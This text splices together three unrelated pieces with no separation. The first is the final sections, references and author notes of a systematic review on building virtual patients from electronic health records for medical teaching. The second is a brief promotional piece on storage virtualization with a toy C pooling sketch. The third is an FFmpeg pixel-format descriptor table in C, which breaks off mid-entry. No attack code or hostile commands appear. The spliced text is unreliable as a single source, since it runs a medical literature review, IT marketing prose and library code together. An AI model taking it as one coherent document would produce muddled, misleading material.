Real patient data, therefore, was used extensively; however, the Virtual Patients still had to be produced (bedside recordings, recordings of the heart murmurs, and so on) and required extensive effort to create [25]. In Medical Teacher, Dewhurst et al. likewise describe work in which a total of 20 Virtual Patient cases were collaboratively developed. Again, this group created their storyboards using the VUE system and imported them into the Labyrinth software. Due to this, the cases created were interchangeable, allowing for collections, or pools, of cases to be built [26]. Schittek Janda et al. describe a Virtual Patient system used in oral health care. The system created was generic, and cases from other medical fields could be imported into it. The system is novel in that it does not provide the student with a list of options from which to choose when input is required. Instead, the student must make decisions using free-text input when, for example, requesting clinical records. This was similar to the work carried out by Oliven et al. Patient data is used throughout, although it had been reformatted to suit the web-based interface [27].

Virtual consultancy
Two papers used Virtual Patients to create virtual consultancies. Wood et al. created a Virtual Consulting Room that allowed doctors to view the progress of patients no longer in their care. The system was intended to be used primarily by junior doctors in order to understand the rationale behind clinical decision-making [28]. Smith et al. performed similar work in their paper for Medical Teacher in 2007. The authors describe Patient-Centred Learning, an evolution of Problem-Based Learning, through the use of high-fidelity Virtual Patients. The group described using the electronic health record, modified for educational purposes, to create a virtual practice. These electronic health records can also link to electronic learning resources. Interestingly, the authors describe the real-time arrival of new data for Virtual Patients, yet the test students were not convinced of the usefulness of this feature; students preferred to be able to "look ahead" at the patient's eventual outcome. The students in the study were undergraduates [29].

Assessment
Three further papers described the use of Virtual Patients for assessment purposes. Gunning et al. describe a system where Virtual Patients were used for the assessment of students who completed a case-based learning course. The group described one patient case in detail, which consisted of 25 physical exams, 25 lab or imaging tests, and so on. The group therefore used a broad range of electronic health records for the creation of their Virtual Patients [30]. Courteille et al. report on the use of a single Virtual Patient as an assessment tool [31], while Subramanian et al. used a web-based medical learning modality that allowed students to treat a memorable Virtual Patient in a case-based format, to test its effectiveness in comparison to a traditional lecture-based format. Two groups of students were assessed three weeks after participating in either a lecture-based modality or the Virtual Patient-based modality. Significant improvements were recorded for the group that used the Virtual Patient [32].

Discussion
Creating Virtual Patients requires considerable effort, both monetarily and in terms of person-hours. A survey of U.S. and Canadian medical schools by Huang et al. found that Virtual Patient development costs are high, with 85% of Virtual Patients costing more than $10,000 to produce and taking an average of 16.6 months to complete. The group also found that the vast majority of Virtual Patients are media-rich, which is partly responsible for these very high costs [3]. However, much research has shown that the development of sound clinical reasoning skills and decision-making abilities is inextricably linked to experience. More specifically, students should encounter multiple, similar cases where subtle variations in patient presentations exist [33]. Through contact with many, subtly different patients, students begin to learn how to build "illness scripts". As stated by Norman et al., it is "the power of the plural" which is key to learning decision-making skills [34]. However, if Virtual Patients and Virtual Patient cases are so costly to develop, it is unlikely that the plurality of cases required can realistically be generated for a student to develop such depth of reasoning. Again, it is argued that for a student to develop good decision-making skills, they must encounter variations of prototypical patient presentations, with each presentation differing only slightly but with largely varying outcomes. For this to be achieved through the use of Virtual Patients, pools of cases are required. However, as can be seen from the work of Huang et al., such archives would be difficult and costly to create through the use of produced, media-rich Virtual Patients. Therefore, our group began experimenting with the notion of creating Virtual Patients using the electronic health records that are abundantly available in hospital information systems, with the ultimate aim of reducing the costs and effort needed to produce Virtual Patients in sufficient numbers. To investigate whether there has been any precedent in this field, this literature review was undertaken. We have seen that although patient data is used extensively to create Virtual Patients, it is rare to see electronic health records used in their raw, unformatted state. With the exception of Virtual Patients based on CT or MRI data, most Virtual Patients that use real patient data use data which has been extracted from electronic health records and subsequently reformatted to suit the platform upon which they are run. This reformatting constitutes production costs, and it is exactly this that our group wishes to avoid by making use of electronic health records directly, without the need for extensive reformatting or data extraction. This does, however, beg the question: why is the use of patient data in its raw form so rare? We believe there are several reasons for this, namely: (1) patient records are still being handwritten, and the use of electronic records is far from widespread; (2) there are concerns regarding patient data and anonymisation; and (3) raw records may contain too many gaps or missing pieces of information. The third point may be the most difficult hurdle to surmount, yet it is the belief of the authors that physician annotations would mitigate this issue to a large degree. We also believe that the potential for using annotated health records has not yet been investigated thoroughly; this point will be the subject of future work. Last, there was little evidence, from the papers reviewed here, of any widespread use of standards such as SCORM to enable inter-institutional collaboration and sharing of Virtual Patients.
Several papers describe the ability of their systems or platforms to allow for pools of cases to be accumulated, or state that their systems allowed for cases to be imported easily, yet they often failed to mention adhering to any particular standards. That said, projects such as eViP, or the IVIMEDS inter-school Reusable Learning Objects [29], go some way toward increasing collaboration by defining standards for Virtual Patient creation.

Conclusions
This paper reports on the usage of unformatted electronic patient records for the creation of Virtual Patients. This review has shown that while patient data is often used as material for the creation of Virtual Patients, the use of the electronic health record itself is less prevalent. Of those Virtual Patients that made use of real patient data, most reformatted the data to suit the platform on which they were to be viewed. This reformatting, in itself, requires a considerable amount of time. Due to this fragmentation, such Virtual Patients (or Virtual Patient cases) cannot easily be interchanged or exchanged, further hampering inter-school collaboration. With the exception of DICOM, standards are not widely adopted. Our group is of the opinion that there are several advantages to using electronic health records for the creation of Virtual Patients, beyond the aforementioned time and monetary savings. The Casebook application being developed by our group will read electronic health records, organised temporally into cases, which have been annotated with meta-information by the teaching physician. Questions for the student to answer appear between patient records, with the next patient record revealing the answer to the question. Patient records are extracted from a hospital information system and used directly, without any reformatting or data extraction. Using health records directly means that Virtual Patients can be created more easily, allowing pools of cases to be built, which is important for enhancing clinical reasoning and clinical decision-making. Our group has previously reported on this in detail [4].

References
1. Consorti F, Mancuso R, Nocioni M, Piccolo A: Efficacy of virtual patients in medical education: a meta-analysis of randomized studies. Comput Educ. 2012, 59(3): 1001-1008. doi:10.1016/j.compedu.2012.04.017.
2. Holzinger A, Kickmeier-Rust M, Wassertheurer S, Hessinger M: Learning performance with interactive simulations in medical education: lessons learned from results of learning complex physiological models with the HAEMOdynamics SIMulator. Comput Educ. 2009, 52(2): 292-301. doi:10.1016/j.compedu.2008.08.008.
3. Huang G, Reynolds R, Candler C: Virtual patient simulation at US and Canadian medical schools. Acad Med. 2007, 82(5): 446-451. doi:10.1097/ACM.0b013e31803e8a0a.
4. Bloice M, Simonic K, Kreuzthaler M, Holzinger A: Development of an interactive application for learning medical procedures and clinical decision making. Information Quality in e-Health. 2011, 7058: 211-224. doi:10.1007/978-3-642-25364-5_17.
5. Jacobson S, Epstein SK, Albright S, Ochieng J, Griffiths J, Coppersmith V, Polak JF: Creation of virtual patients from CT images of cadavers to enhance integration of clinical and basic science student learning in anatomy. Med Teach. 2009, 31(8): 749-751. doi:10.1080/01421590903124757.
6. Parikh SS, Chan S, Agrawal SK, Hwang PH, Salisbury CM, Rafii BY, Varma G, Salisbury KJ, Blevins NH: Integration of patient-specific paranasal sinus computed tomographic data into a virtual surgical environment. Am J Rhinol Allergy. 2009, 23(4): 442-447. doi:10.2500/ajra.2009.23.3335.
7. King BW, Reisner LA, Ellis RD, Klein MD, Auner GW, Pandya AK: Optimized port placement for in vivo biosensors. Int J Med Robot. 2009, 5(3): 267-275. doi:10.1002/rcs.257.
8. Porro I, Schenone A, Fato M, Raposio E, Molinari E, Beltrame F: An integrated environment for plastic surgery support: building virtual patients, simulating interventions, and supporting intraoperative decisions. Comput Med Imaging Graph. 2005, 29(5): 385-394. doi:10.1016/j.compmedimag.2005.02.005.
9. Heer IM, Middendorf K, Müller-Egloff S, Dugas M, Strauss A: Ultrasound training: the virtual patient. Ultrasound Obstet Gynecol. 2004, 24(4): 440-444. doi:10.1002/uog.1715.
10. Michel MS, Knoll T, Köhrmann KU, Alken P: The URO Mentor: development and evaluation of a new computer-based interactive training system for virtual life-like simulation of diagnostic and therapeutic endourological procedures. BJU Int. 2002, 89(3): 174-177. doi:10.1046/j.1464-4096.2001.01644.x.
11. Freysinger W, Truppe MJ, Gunkel AR, Thumfart WF: A full 3D-navigation system in a suitcase. Comput Aided Surg. 2001, 6(2): 85-93. doi:10.3109/10929080109145995.
12. Lamadé W, Glombitza G, Fischer L, Chiu P, Cárdenas CE, Thorn M, Meinzer HP, Grenacher L, Bauer H, Lehnert T, Herfarth C: The impact of 3-dimensional reconstructions on operation planning in liver surgery. Arch Surg. 2000, 135(11): 1256-1261. doi:10.1001/archsurg.135.11.1256.
13. Ehricke HH: SONOSim3D: a multimedia system for sonography simulation and education with an extensible case database. Eur J Ultrasound. 1998, 7(3): 225-300. doi:10.1016/S0929-8266(98)00033-0.
14. Shyu FM, Liang YF, Hsu WT, Luh JJ, Chen HS: A problem-based e-Learning prototype system for clinical medical education. Stud Health Technol Inform. 2004, 107(Pt 2): 983-987.
15. Trace C, Baillie S, Short N: Development and preliminary evaluation of student-authored electronic cases. J Vet Med Educ. 2012, 39(4): 368-374. doi:10.3138/jvme.0212-017R.
16. Ullrich S, Grottke O, Fried E, Frommen T, Liao W, Rossaint R, Kuhlen T, Deserno TM: An intersubject variable regional anesthesia simulator with a virtual patient architecture. Int J Comput Assist Radiol Surg. 2009, 4(6): 561-570. doi:10.1007/s11548-009-0371-5.
17. Oliven A, Nave R, Gilad D, Barch A: Implementation of a web-based interactive virtual patient case simulation as a training and assessment tool for medical students. Stud Health Technol Inform. 2011, 169: 233-237.
18. Abendroth M, Harendza S, Riemer M: Clinical decision making: a pilot e-learning study. Clin Teach. 2013, 10(1): 51-55. doi:10.1111/j.1743-498X.2012.00629.x.
19. Pinnock R, Spence F, Chung A, Booth R: evPaeds: undergraduate clinical reasoning. Clin Teach. 2012, 9(3): 152-157. doi:10.1111/j.1743-498X.2011.00523.x.
20. Hörnlein A, Mandel A, Ifland M, Lüneberg E, Deckert J, Puppe F: Acceptance of medical training cases as supplement to lectures. GMS Z Med Ausbild. 2011, 28(3): 1-7.
21. Edelbring S, Dastmalchi M, Hult H, Lundberg IE, Dahlgren LO: Experiencing virtual patients in clinical learning: a phenomenological study. Adv Health Sci Educ Theory Pract. 2011, 16(3): 331-345. doi:10.1007/s10459-010-9265-0.
22. Adams EC, Rodgers CJ, Harrington R, Young MD, Sieber VK: How we created virtual patient cases for primary care-based learning. Med Teach. 2011, 33(4): 273-278. doi:10.3109/0142159X.2011.544796.
23. Poulton T, Conradi E, Kavia S, Round J, Hilton S: The replacement of 'paper' cases by interactive online virtual patients in problem-based learning. Med Teach. 2009, 31(8): 752-758. doi:10.1080/01421590903141082.
24. Hooper LM, Weinfurt KP, Cooper LA, Mensh J, Harless W, Kuhajda MC, Epstein SA: Virtual standardized patients: an interactive method to examine variation in depression care among primary care physicians. Prim Health Care Res Dev. 2008, 9(4): 257-268. doi:10.1017/S1463423608000820.
25. Vukanovic-Criley JM, Boker JR, Criley SR, Rajagopalan S, Criley JM: Using virtual patients to improve cardiac examination competency in medical students. Clin Cardiol. 2008, 31(7): 334-339. doi:10.1002/clc.20213.
26. Dewhurst D, Borgstein E, Grant ME, Begg M: Online virtual patients - a driver for change in medical and healthcare professional education in developing countries?. Med Teach. 2009, 31(8): 721-724. doi:10.1080/01421590903124732.
27. Schittek Janda M, Mattheos N, Nattestad A, Wagner A, Nebel D, Färbom C, Lê DH, Attström R: Simulation of patient encounters using a virtual patient in periodontology instruction of dental students: design, usability, and learning effect in history-taking skills. Eur J Dent Educ. 2004, 8(3): 111-119. doi:10.1111/j.1600-0579.2004.00339.x.
28. Wood E, Tso S: The virtual continuity in learning programme: results. Clin Teach. 2012, 9(4): 216-221. doi:10.1111/j.1743-498X.2012.00551.x.
29. Smith SR, Cookson J, McKendree J, Harden RM: Patient-centred learning - back to the future. Med Teach. 2007, 29(1): 33-37. doi:10.1080/01421590701213406.
30. Gunning WT, Fors UG: Virtual patients for assessment of medical student ability to integrate clinical and laboratory data to develop differential diagnoses: comparison of results of exams with/without time constraints. Med Teach. 2012, 34(4): e222-e228. doi:10.3109/0142159X.2012.642830.
31. Courteille O, Bergin R, Stockeld D, Ponzer S, Fors U: The use of a virtual patient case in an OSCE-based exam - a pilot study. Med Teach. 2008, 30(3): e66-e76. doi:10.1080/01421590801910216.
32. Subramanian A, Timberlake M, Mittakanti H, Lara M, Brandt ML: Novel educational approach for medical students: improved retention rates using interactive medical software compared with traditional lecture-based format. J Surg Educ. 2012, 69(4): 449-452. doi:10.1016/j.jsurg.2012.05.013.
33. Bowen JL: Educational strategies to promote clinical diagnostic reasoning. N Engl J Med. 2006, 355(21): 2217-2225. doi:10.1056/NEJMra054782.
34. Norman G, Dore K, Krebs J, Neville AJ: The power of the plural: effect of conceptual analogies on successful transfer. Acad Med. 2007, 82(10): S16-S18.

Correspondence to Andreas Holzinger.

Competing interests
The authors declare that they have no competing interests.

Authors' contributions
MDB, KMS, and AH conceived the idea of performing a systematic search of PubMed in order to find Virtual Patient systems that use electronic health records. MDB performed the extraction and reviewed the works. The Java application was written by MDB. The database was administered by MDB. All authors read and approved the final manuscript.

Electronic supplementary material
Additional file 1: All citations considered for the review (articles.htm). All citations returned by the E-utilities API are included in this HTML file, which can be viewed with any web browser. The file contains links to PubMed for each of the 362 citations included in the review. For copyright reasons, the abstract texts themselves have been removed. (HTM 199 KB)
Additional file 2: Table of reviewed articles. Each of the full-text articles reviewed in the final phase of the review is shown here. It can be seen whether any standards were followed, the type of patient data used to create the Virtual Patient(s), and whether the platform described allowed for cases to be interchanged. Where no standards such as SCORM were followed, the case format is provided, such as XML or PowerPoint. (DOCX 22 KB)

Open Access: This article is distributed under the terms of the Creative Commons Attribution License (https://creativecommons.org/licenses/by/2.0), which permits unrestricted use, distribution, and reproduction in any medium, provided the original work is properly cited.

Cite this article: Bloice MD, Simonic KM, Holzinger A: On the usage of health records for the design of virtual patients: a systematic review. BMC Med Inform Decis Mak. 2013, 13: 103. doi:10.1186/1472-6947-13-103.
The Benefits of Virtual Data Storage

Storage virtualization abstracts storage management from the physical hardware and presents the combined capacity as a single pool. This allows applications to run on a single server or a reduced number of servers. It also removes the dependency between data accessed at the file level and its physical location on the server, making it easier to optimize storage use, perform non-disruptive file migrations, and more.

Storage virtualization is an essential element of modern IT environments, with numerous benefits that can dramatically improve IT operations and reduce costs. It allows a company to reduce overheads by reducing the number of physical servers required for each application, and it makes migrating to new technology platforms easier.

The most significant benefit of virtual data storage is that it simplifies the IT environment by decreasing the amount of physical hardware needed to support applications. In the past, each application had its own hardware; think of print servers or mail servers. With traditional data storage models, companies overcrowded their datacenters with redundant and expensive hardware. Storage virtualization allows an IT team to simplify their approach and decrease the cost of maintaining an intricate datacenter.

Virtual storage also allows an organization to consolidate its server SAN while decreasing CAPEX, since the same internal drives can be used for both purposes. Better performance and better storage utilization can be achieved by combining multiple storage arrays and disks into one pool that is accessed by all the servers in the SAN.
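To make the pooling idea concrete, here is a toy sketch in C. Every name in it is a hypothetical illustration, not any vendor's API: several physical devices sit behind one pool, applications ask the pool for space, and only the pool knows which device actually backs an allocation.

#include <stdio.h>

/* Toy model: a "pool" hides individual devices behind one capacity figure. */
struct device { const char *id; long free_gb; };
struct pool   { struct device *devs; int n; };

/* Total capacity as applications see it: one number, not per-server disks. */
long pool_free_gb(const struct pool *p) {
    long total = 0;
    for (int i = 0; i < p->n; i++)
        total += p->devs[i].free_gb;
    return total;
}

/* Allocate from whichever device has room; the caller never learns which. */
int pool_alloc(struct pool *p, long gb) {
    for (int i = 0; i < p->n; i++) {
        if (p->devs[i].free_gb >= gb) {
            p->devs[i].free_gb -= gb;
            return 0;  /* success */
        }
    }
    return -1;  /* no single device has room (this toy does not stripe) */
}

int main(void) {
    struct device devs[] = { {"san-a", 500}, {"san-b", 250} };
    struct pool p = { devs, 2 };
    printf("pool capacity: %ld GB free\n", pool_free_gb(&p));
    pool_alloc(&p, 300);  /* lands on san-a; the application never knows */
    printf("after allocation: %ld GB free\n", pool_free_gb(&p));
    return 0;
}

A real storage virtualization layer adds striping, migration, and fault handling on top of this, but the essential move is the same: applications see pool_free_gb(), never the individual devices.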
/*
 * pixel format descriptor
 * Copyright (c) 2009 Michael Niedermayer
 *
 * This file is part of FFmpeg.
 *
 * FFmpeg is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * FFmpeg is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with FFmpeg; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
 */

#include "pixfmt.h"
#include "pixdesc.h"

const AVPixFmtDescriptor av_pix_fmt_descriptors[PIX_FMT_NB] = {
    [PIX_FMT_YUV420P] = {
        .name = "yuv420p", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUYV422] = {
        .name = "yuyv422", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,7} /* Y */, {0,3,2,0,7} /* U */, {0,3,4,0,7} /* V */ },
    },
    [PIX_FMT_RGB24] = {
        .name = "rgb24", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,2,1,0,7} /* R */, {0,2,2,0,7} /* G */, {0,2,3,0,7} /* B */ },
    },
    [PIX_FMT_BGR24] = {
        .name = "bgr24", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,2,1,0,7} /* B */, {0,2,2,0,7} /* G */, {0,2,3,0,7} /* R */ },
    },
    [PIX_FMT_YUV422P] = {
        .name = "yuv422p", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUV444P] = {
        .name = "yuv444p", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUV410P] = {
        .name = "yuv410p", .nb_channels = 3, .log2_chroma_w = 2, .log2_chroma_h = 2,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUV411P] = {
        .name = "yuv411p", .nb_channels = 3, .log2_chroma_w = 2, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_GRAY8] = {
        .name = "gray8", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */ },
    },
    [PIX_FMT_MONOWHITE] = {
        .name = "monowhite", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,0} /* Y */ }, .flags = PIX_FMT_BITSTREAM,
    },
    [PIX_FMT_MONOBLACK] = {
        .name = "monoblack", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,7,0} /* Y */ }, .flags = PIX_FMT_BITSTREAM,
    },
    [PIX_FMT_PAL8] = {
        .name = "pal8", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} }, .flags = PIX_FMT_PAL,
    },
    [PIX_FMT_YUVJ420P] = {
        .name = "yuvj420p", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUVJ422P] = {
        .name = "yuvj422p", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUVJ444P] = {
        .name = "yuvj444p", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_XVMC_MPEG2_MC]   = { .name = "xvmc_mpeg2_mc",   .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_XVMC_MPEG2_IDCT] = { .name = "xvmc_mpeg2_idct", .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_UYVY422] = {
        .name = "uyvy422", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 0,
        .comp = { {0,1,2,0,7} /* Y */, {0,3,1,0,7} /* U */, {0,3,3,0,7} /* V */ },
    },
    [PIX_FMT_UYYVYY411] = {
        .name = "uyyvyy411", .nb_channels = 3, .log2_chroma_w = 2, .log2_chroma_h = 0,
        .comp = { {0,3,2,0,7} /* Y */, {0,5,1,0,7} /* U */, {0,5,4,0,7} /* V */ },
    },
    [PIX_FMT_BGR8] = {
        .name = "bgr8", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,6,1} /* B */, {0,0,1,3,2} /* G */, {0,0,1,0,2} /* R */ },
        .flags = PIX_FMT_PAL,
    },
    [PIX_FMT_BGR4] = {
        .name = "bgr4", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,0} /* B */, {0,3,2,0,1} /* G */, {0,3,4,0,0} /* R */ },
        .flags = PIX_FMT_BITSTREAM,
    },
    [PIX_FMT_BGR4_BYTE] = {
        .name = "bgr4_byte", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,3,0} /* B */, {0,0,1,1,1} /* G */, {0,0,1,0,0} /* R */ },
        .flags = PIX_FMT_PAL,
    },
    [PIX_FMT_RGB8] = {
        .name = "rgb8", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,6,1} /* R */, {0,0,1,3,2} /* G */, {0,0,1,0,2} /* B */ },
        .flags = PIX_FMT_PAL,
    },
    [PIX_FMT_RGB4] = {
        .name = "rgb4", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,0} /* R */, {0,3,2,0,1} /* G */, {0,3,4,0,0} /* B */ },
        .flags = PIX_FMT_BITSTREAM,
    },
    [PIX_FMT_RGB4_BYTE] = {
        .name = "rgb4_byte", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,0,1,3,0} /* R */, {0,0,1,1,1} /* G */, {0,0,1,0,0} /* B */ },
        .flags = PIX_FMT_PAL,
    },
    [PIX_FMT_NV12] = {
        .name = "nv12", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,1,1,0,7} /* U */, {1,1,2,0,7} /* V */ },
    },
    [PIX_FMT_NV21] = {
        .name = "nv21", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,1,1,0,7} /* V */, {1,1,2,0,7} /* U */ },
    },
    [PIX_FMT_ARGB] = {
        .name = "argb", .nb_channels = 4, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,7} /* A */, {0,3,2,0,7} /* R */, {0,3,3,0,7} /* G */, {0,3,4,0,7} /* B */ },
    },
    [PIX_FMT_RGBA] = {
        .name = "rgba", .nb_channels = 4, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,7} /* R */, {0,3,2,0,7} /* G */, {0,3,3,0,7} /* B */, {0,3,4,0,7} /* A */ },
    },
    [PIX_FMT_ABGR] = {
        .name = "abgr", .nb_channels = 4, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,7} /* A */, {0,3,2,0,7} /* B */, {0,3,3,0,7} /* G */, {0,3,4,0,7} /* R */ },
    },
    [PIX_FMT_BGRA] = {
        .name = "bgra", .nb_channels = 4, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,3,1,0,7} /* B */, {0,3,2,0,7} /* G */, {0,3,3,0,7} /* R */, {0,3,4,0,7} /* A */ },
    },
    [PIX_FMT_GRAY16BE] = {
        .name = "gray16be", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */ }, .flags = PIX_FMT_BE,
    },
    [PIX_FMT_GRAY16LE] = {
        .name = "gray16le", .nb_channels = 1, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,1,0,15} /* Y */ },
    },
    [PIX_FMT_YUV440P] = {
        .name = "yuv440p", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUVJ440P] = {
        .name = "yuvj440p", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */ },
    },
    [PIX_FMT_YUVA420P] = {
        .name = "yuva420p", .nb_channels = 4, .log2_chroma_w = 1, .log2_chroma_h = 1,
        .comp = { {0,0,1,0,7} /* Y */, {1,0,1,0,7} /* U */, {2,0,1,0,7} /* V */, {3,0,1,0,7} /* A */ },
    },
    [PIX_FMT_VDPAU_H264]  = { .name = "vdpau_h264",  .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VDPAU_MPEG1] = { .name = "vdpau_mpeg1", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VDPAU_MPEG2] = { .name = "vdpau_mpeg2", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VDPAU_WMV3]  = { .name = "vdpau_wmv3",  .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VDPAU_VC1]   = { .name = "vdpau_vc1",   .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VDPAU_MPEG4] = { .name = "vdpau_mpeg4", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_RGB48BE] = {
        .name = "rgb48be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,5,1,0,15} /* R */, {0,5,3,0,15} /* G */, {0,5,5,0,15} /* B */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_RGB48LE] = {
        .name = "rgb48le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,5,1,0,15} /* R */, {0,5,3,0,15} /* G */, {0,5,5,0,15} /* B */ },
    },
    [PIX_FMT_RGB565BE] = {
        .name = "rgb565be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,0,3,4} /* R */, {0,1,1,5,5} /* G */, {0,1,1,0,4} /* B */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_RGB565LE] = {
        .name = "rgb565le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,2,3,4} /* R */, {0,1,1,5,5} /* G */, {0,1,1,0,4} /* B */ },
    },
    [PIX_FMT_RGB555BE] = {
        .name = "rgb555be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,0,2,4} /* R */, {0,1,1,5,4} /* G */, {0,1,1,0,4} /* B */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_RGB555LE] = {
        .name = "rgb555le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,2,2,4} /* R */, {0,1,1,5,4} /* G */, {0,1,1,0,4} /* B */ },
    },
    [PIX_FMT_BGR565BE] = {
        .name = "bgr565be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,0,3,4} /* B */, {0,1,1,5,5} /* G */, {0,1,1,0,4} /* R */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_BGR565LE] = {
        .name = "bgr565le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,2,3,4} /* B */, {0,1,1,5,5} /* G */, {0,1,1,0,4} /* R */ },
    },
    [PIX_FMT_BGR555BE] = {
        .name = "bgr555be", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,0,2,4} /* B */, {0,1,1,5,4} /* G */, {0,1,1,0,4} /* R */ },
        .flags = PIX_FMT_BE,
    },
    [PIX_FMT_BGR555LE] = {
        .name = "bgr555le", .nb_channels = 3, .log2_chroma_w = 0, .log2_chroma_h = 0,
        .comp = { {0,1,2,2,4} /* B */, {0,1,1,5,4} /* G */, {0,1,1,0,4} /* R */ },
    },
    [PIX_FMT_VAAPI_MOCO] = { .name = "vaapi_moco", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VAAPI_IDCT] = { .name = "vaapi_idct", .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_VAAPI_VLD]  = { .name = "vaapi_vld",  .log2_chroma_w = 1, .log2_chroma_h = 1, .flags = PIX_FMT_HWACCEL },
    [PIX_FMT_YUV420P16LE] = {
        .name = "yuv420p16le", .nb_channels = 3, .log2_chroma_w = 1, .log2_chroma_h = 1,
